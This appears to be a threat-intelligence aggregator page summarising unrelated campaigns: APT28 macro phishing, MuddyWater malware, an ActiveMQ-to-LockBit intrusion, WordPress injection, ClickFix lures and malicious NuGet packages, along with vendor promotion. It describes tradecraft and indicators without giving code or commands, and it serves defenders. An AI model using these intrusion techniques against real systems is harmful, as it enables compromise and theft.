Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation
The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes APT28 activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing lures with Office macros that beacon via INCLUDEPICTURE to webhook[.]site and then execute VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, MuddyWater (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a Char backdoor using a Telegram bot for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing.
Criminal activity and initial-access tradecraft were also covered across distinct stories: a DFIR case study described exploitation of Apache ActiveMQ CVE-2023-46604 to gain RCE, conduct post-exploitation (Metasploit/Meterpreter, privilege escalation, LSASS access, lateral movement), and ultimately deploy LockBit-branded ransomware via RDP using previously stolen credentials (with indications the payload was built using the leaked builder and used Session for communications). Multiple reports described malware delivery via compromised web assets and social engineering, including GrayCharlie injecting malicious JavaScript into WordPress sites to push NetSupport RAT, Stealc, and SectopRAT via fake updates/ClickFix-style CAPTCHAs, and a separate ClickFix campaign delivering a custom C++ RAT (MIMICRAT) through fake Cloudflare verification prompts that trick users into running PowerShell. Additional, unrelated threat reporting included a NuGet supply-chain attack (typosquatted NCryptYo plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “Promise Bomb” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
12 events from the most recent confirmed update back to the earliest known activity.
Group-IB publicly reports new MuddyWater malware set
Group-IB publicly described Operation Olalampo as a fresh MuddyWater campaign and noted that some malware components showed signs consistent with AI-assisted development, including unusual debug strings. The report also released IoCs and detection rules to help defenders identify the activity.
LAB52 attributes MacroMaze campaign to APT28
S2 Grupo's LAB52 publicly attributed Operation MacroMaze to the Russia-linked threat actor APT28 and detailed its webhook-based macro malware workflow. The disclosure highlighted the campaign's use of native tooling and legitimate web services to minimize artifacts and evade detection.
Researchers disclose GrayCharlie targeting of US law firm websites
Researchers reported that at least fifteen US law firm websites were found injected with identical malicious JavaScript pointing to the same attacker domain. They also suspected a supply-chain compromise involving SMB Team, an IT services provider to law firms, based on stolen credentials tied to an SMB Team email address.
Socket reports NuGet supply-chain campaign and seeks takedowns
Socket's Threat Research Team disclosed that the four malicious NuGet packages had accumulated about 4,500 downloads and appeared linked by shared credentials, build artifacts, and metadata quirks. Socket said it submitted takedown requests to the NuGet security team and published defensive guidance for dependency auditing and detection.
Elastic identifies MIMICRAT ClickFix campaign
In early February 2026, Elastic analysts reported a multi-stage campaign using compromised websites and fake Cloudflare verification prompts to trick users into running PowerShell commands. The infection chain deployed a custom RAT called MIMICRAT, which supports stealth, persistence, token theft, file manipulation, and SOCKS5 tunneling.
Group-IB discovers MuddyWater Operation Olalampo
On January 26, 2026, Group-IB first discovered a new MuddyWater campaign dubbed Operation Olalampo targeting organizations and individuals mainly in MENA and parts of Africa. The activity used phishing documents and sometimes public-facing server exploitation to deliver new malware families including Char, GhostFetch, GhostBackDoor, and HTTP_VIP leading to AnyDesk.
APT28 launches Operation MacroMaze against European targets
From September 2025 through January 2026, APT28 conducted a spear-phishing campaign dubbed Operation MacroMaze against entities in Western and Central Europe. The operation used lure documents with INCLUDEPICTURE tracking beacons, evolving macro techniques, and webhook[.]site for command retrieval and exfiltration.
GrayCharlie infrastructure expands through 2025
Researchers observed two main NetSupport RAT command-and-control clusters associated with GrayCharlie being deployed steadily through 2025. The infrastructure used distinct TLS certificate naming patterns, license keys, and serial numbers, with hosting linked in part to MivoCloud and HZ Hosting Ltd.
Malicious NuGet packages published to target ASP.NET developers
Between August 12 and August 21, 2024, four malicious NuGet packages — NCryptYo, DOMOAuth2_, IRAOAuth2.0, and SimpleWriter_ — were published by the account "hamzazaheer." The packages were designed to backdoor ASP.NET applications through JIT hooking, localhost proxying, credential and authorization-data theft, and attacker-controlled authorization responses.
Attacker re-enters via unpatched ActiveMQ flaw and deploys ransomware
Eighteen days after the first intrusion, the same actor returned through the still-unpatched Apache ActiveMQ vulnerability, reused prior C2 infrastructure, enabled RDP, installed AnyDesk, and conducted additional scanning. Ransomware consistent with LockBit, but assessed as likely built with the leaked LockBit builder, was then deployed interactively across servers including backup and file servers.
Apache ActiveMQ server first exploited for initial access
In mid-February 2024, a threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server to gain remote code execution and establish a foothold on a Windows host. The attacker downloaded a Metasploit stager, escalated privileges, dumped LSASS, scanned via SMB, and moved laterally before being evicted about a day later.
GrayCharlie begins WordPress malware campaign
GrayCharlie has been active since mid-2023, compromising WordPress sites and injecting malicious JavaScript to deliver malware such as NetSupport RAT, Stealc, and SectopRAT to site visitors. The campaign relied on fake browser updates and ClickFix-style fake CAPTCHA lures.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
7 references tracked. Mallory keeps watching after this page renders.
APT28 Targeted European Entities Using Webhook-Based Macro Malware
thehackernews.com
Open sourceGrayCharlie Injects Malicious JavaScript into WordPress Sites to Deliver NetSupport RAT and Stealc - Cyber Security News
cybersecuritynews.com
Open sourceNew MIMICRAT Custom RAT Uncovered in Sophisticated Multi-Stage ClickFix Campaign
cybersecuritynews.com
Open sourceFour Malicious NuGet Packages Target ASP.NET Developers With...
socket.dev
Open sourceApache ActiveMQ Exploit Leads to LockBit Ransomware - The DFIR Report
thedfirreport.com
Open sourcePromise Bomb crashes browsers to install malware | Annex Blog
annex.security
Open sourceIran's MuddyWater Targets Orgs With Fresh Malware as Tensions Mount
darkreading.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Multiple APT and malware campaigns abusing phishing, cloud services, and signed binaries
Reporting across multiple research teams described a surge of distinct, ongoing intrusion campaigns rather than a single unified incident. **Check Point** reported on **Silver Dragon**, a Chinese-aligned activity cluster assessed as operating under the broader **APT41** umbrella, targeting organizations in **Southeast Asia and Europe** (notably government) via exploitation of public-facing servers and phishing, then deploying **Cobalt Strike**, **DNS tunneling**, and a new Google Drive–based backdoor (**GearDoor**) alongside custom tools (**SSHcmd** and **SliverScreen**) for remote access and screen capture. **Microsoft** detailed separate February 2026 phishing campaigns by an unknown actor that used meeting/invoice-style lures and **EV code-signed** malware (certificate issued to **TrustConnect Software PTY LTD**) masquerading as common workplace apps (e.g., `msteams.exe`, `adobereader.exe`, `zoomworkspace.clientsetup.exe`) to install legitimate **RMM** tooling (**ScreenConnect**, **Tactical RMM**, **Mesh Agent**) for persistent access and lateral movement. Other reporting highlighted additional, unrelated campaigns and tradecraft: **ClearSky** described a Russian-aligned operation targeting **Ukraine** using a phishing-delivered ZIP/HTA chain that drops a .NET loader (**BadPaw**) and backdoor (**MeowMeow**) with **.NET Reactor** obfuscation, parameter-gated execution, and sandbox/tooling checks (with low-confidence linkage to **APT28**). **Cofense**-reported activity (via SC Media) showed phishing that weaponizes **Windows File Explorer + WebDAV** using URL/LNK shortcuts to pull payloads (notably **AsyncRAT**, **XWorm**, **DcRAT**) and infrastructure including **Cloudflare Tunnel** domains hosting WebDAV servers. **Cisco Talos**-reported **Dohdoor** activity (UAT-10027) targeted US **education and healthcare**, using PowerShell→batch→DLL sideloading via legitimate executables (e.g., `Fondue.exe`, `mblctr.exe`, `ScreenClippingHost.exe`) and **DNS-over-HTTPS** to Cloudflare for C2 discovery and tunneling. Separately, **Zscaler** reported **ScarCruft**’s *Ruby Jumper* campaign using **Zoho WorkDrive** for C2 and removable media components to reach air-gapped systems, while another Zscaler report analyzed **Dust Specter** targeting Iraqi government officials with password-protected RAR delivery and modular implants. **Qianxin XLab** assessed sanctioned infrastructure provider **Funnull** resurfacing to support scam/criminal supply chains and potential **MacCMS**-related supply-chain activity, and **F5 Labs** summarized **APT42**’s **TAMECAT** PowerShell backdoor focused on Edge/Chrome credential theft with C2 over Telegram/Discord/HTTPS and specific file/hash indicators. (A separate Help Net Security item on a Microsoft Defender onboarding tool is product/administrative news and not part of the threat-campaign reporting.)
Mar 21, 2026
Security Research Roundup: Supply-Chain Malware, Phishing Operations, and Evolving Social Engineering
Multiple security reports and investigations highlighted active threats spanning software supply chain abuse, phishing operations, and commodity malware delivery. Socket identified **four malicious NuGet packages** (e.g., *NCryptYo*, *DOMOAuth2_*, *IRAOAuth2.0*, *SimpleWriter_*) published by `hamzazaheer` that targeted **ASP.NET** developers by exfiltrating ASP.NET Identity data (users/roles/permissions) and manipulating authorization to maintain persistence; the campaign used a staged loader that set up a local proxy on `localhost:7152` to relay traffic to dynamically resolved C2 infrastructure. Separately, investigators disrupted a logistics-focused **phishing-as-a-service** operation (“**Diesel Vortex**”) tied to Russian/Armenian operators, which used dozens of domains to target users of platforms such as **DAT**, **Truckstop**, **Penske Logistics**, **EFS**, and **Timocom**, resulting in theft of over **1,600 credentials** and attempted **EFS check fraud**. Fortinet also detailed a **multi-stage Agent Tesla** infection chain delivered via phishing with RAR attachments leading to `.jse` and PowerShell stages, culminating in in-memory execution and process hollowing into `C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe`. Threat intelligence and ecosystem reporting also underscored how attackers are scaling operations and bypassing traditional controls. Group-IB reported **MuddyWater** (“Operation Olalampo”) targeting the **MENA** region with new tooling including **GhostFetch** and a Rust backdoor (**CHAR**) controlled via **Telegram**, plus variants that deploy **AnyDesk**; the report noted indicators consistent with **AI-assisted development**. Dark Reading described the rise of **telephone-oriented attack delivery (TOAD)** emails—messages containing only a phone number—which accounted for a significant share of gateway-bypassing detections in StrongestLayer’s dataset, reflecting a shift toward social-engineering paths that evade link/attachment scanning. Confiant reported disrupting **D-Shortiez** malvertising operations after discovering exposed internal testing/admin infrastructure, attributing **59 million** malicious ad impressions (primarily US-targeted) to scam campaigns, while Interpol-backed **Operation Red Card 2.0** reported **651 arrests** and **$4.3M** recovered across 16 African countries in actions against fraud rings and cybercrime syndicates.
Mar 21, 2026
Social Engineering and Malware Campaigns Using Diverse Lures and Delivery Chains
Multiple reports describe **distinct malware and intrusion campaigns** active across enterprise, government, developer, and consumer targets, rather than a single shared incident. The activity includes vishing-led abuse of *Quick Assist* for remote access and persistence, a **.NET AOT** malware chain delivering **Rhadamanthys** and **XMRig**, renewed **Horabot** banking Trojan activity using fake CAPTCHA and `mshta`, a compromised *Open VSX* extension that fetched **BlokTrooper** payloads, and a Middle East-focused Ramadan coupon lure delivering a **RAT** with AWS S3-based exfiltration. Additional reporting covers **Operation CamelClone**, which used government-themed spear-phishing and `LNK` files to steal data with *Rclone*, and **Contagious Trader**, a cryptocurrency-focused campaign tied to malicious GitHub and npm projects. One reference stands apart as vulnerability research rather than campaign reporting: watchTowr detailed **pre-authenticated RCE chains in BMC FootPrints**, which is a separate product security disclosure and not part of the malware operations described elsewhere. Because the references cover unrelated incidents, malware families, and victim sets, the material should **not** be treated as one cohesive event. It is also **not fluff**, as the sources contain substantive threat intelligence, technical analysis, exploit research, and incident tradecraft rather than marketing or generic advice.
Mar 24, 2026